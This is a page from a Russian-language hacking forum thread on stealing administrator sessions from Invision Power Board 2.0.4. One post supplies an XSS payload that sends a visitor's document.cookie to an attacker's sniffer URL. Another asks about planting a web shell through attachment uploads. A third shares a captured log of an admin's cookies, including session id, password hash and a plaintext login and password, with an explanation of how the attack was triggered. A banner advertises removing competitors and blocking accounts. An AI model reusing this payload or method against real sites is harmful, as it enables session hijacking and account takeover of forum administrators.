как получить админские сессии в Ipb 2.0.4?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
как получить админские сессии в Ipb 2.0.4?

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

09.12.2005, 14:26

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

Провел на форуме:
5605982

Репутация: 523

Цитата:

Помоги(те) полажуйста ! Если адрес снифера http://antichat.org/s/abcd.gif ,то как будет выглядеть эта строка
<scriptlanguage=JavaScript>document.location.href= "http://www.vash_server.ru/test.php?"+document.cookie</script>

Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)

#22

10.12.2005, 08:08

Гаврила

Постоянный

Регистрация: 24.10.2005

Сообщений: 343

Провел на форуме:
3175190

Репутация: 134

Цитата:

Сообщение от <<YaYaYa>>

Вместо http://www.vash_server.ru/test.php? подставь адрес своего сниффера. Сможешь?-)

Там проблема в другом была.Спасибо,уже разобрался.

#23

10.12.2005, 19:56

~~Danya~~

Banned

Регистрация: 27.11.2005

Сообщений: 18

Провел на форуме:
75754

Репутация: 1

а кто нибудь пробовал чтонибудь делать с аттачментами, которые пишутся в папку uploads? там проблема в том, что расширение мняется или в чем то еще? это я к тому что можно ли както аттачментом залить шелл, а потом его както использовать?

АХТУНГ!!!

#24

10.12.2005, 20:23

FHT

Постоянный

Регистрация: 21.09.2005

Сообщений: 525

Провел на форуме:
2994394

Репутация: 547

АХТУНГ!!!

Не знаю как для кого, но для меня было потрясающей
новостью, что при использовании хсс ко мне пришли
куки админа, содержащие логин и пасс в ОТКРЫТОМ виде. (Атаковался IPB 2.0.1)
-------------------------------------

Код:

IP: *.*.*.100 
REFERER: http://***/forum/index.php?showtopic=175&st=80
QUERY: 69&member_id=1; pass_hash=f8447ce02eba492abe3249294aed4bf4;
forum_read=a:10:
{i:3;i:1134211808;i:2;i:1134174577;i:8;i:1134218332;i:
11;i:1134081264;i:13;i:1133595567;i:7;i:1133683890;i:
12;i:1133683875;i:10;i:1134174724;i:5;i:1133951226;i:
6;i:1134221372;}; 
acpcollapseprefs=100,200,900,1400; anonlogin=-1;
topicmode=linear; slogin=ariman;spass=tornado; 
session_id=dcbf597a8db2190e362cf4ffd8b15dcb; 
modtids=,; topicsread=a:1:{i:175;i:1134231356;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
5.1; SV1)

-------------------------------------
Как так получилось? Ответ:
В том случае если админ лезет модерировать форум и видит вашу мессагу,
к вам придет логин и пасс в открытом виде.
Проверено-канает.

Последний раз редактировалось ShturmBanFurrer; 10.12.2005 в 20:26..

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4	Ice_Fro$T	Уязвимости CMS / форумов	19	18.11.2006 09:19
Взлом форумов IPB версии < 2.0.4	Ice_Fro$T	Уязвимости CMS / форумов	16	29.12.2005 12:22
Взлом IBP 2.0.4 через Xss	Astro	Уязвимости CMS / форумов	3	29.11.2005 21:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход